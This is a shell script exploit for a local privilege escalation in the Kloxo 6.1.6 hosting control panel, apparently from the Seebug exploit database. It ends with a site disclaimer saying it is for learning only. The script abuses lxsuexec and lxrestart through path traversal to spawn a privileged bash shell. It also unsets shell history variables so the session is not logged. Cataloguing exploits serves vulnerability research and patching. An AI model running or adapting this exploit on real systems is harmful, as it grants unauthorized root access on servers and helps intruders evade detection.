#!/bin/sh # Exploit Title: Kloxo Local Privilege Escalation # Google Dork: inurl:kiddies # Date: August 2012 or so # Exploit Author: HTP # Vendor Homepage: http://lxcenter.org/ # Software Link: [download link if available] # Version: 6.1.6 (Latest) # Tested on: CentOS 5 # CVE : None # This exploit requires you to be the Apache user, or another capable of running lxsuexec. LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3` export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECK_GID=0 export NON_RESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol lxsuexec /tmp/lol
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论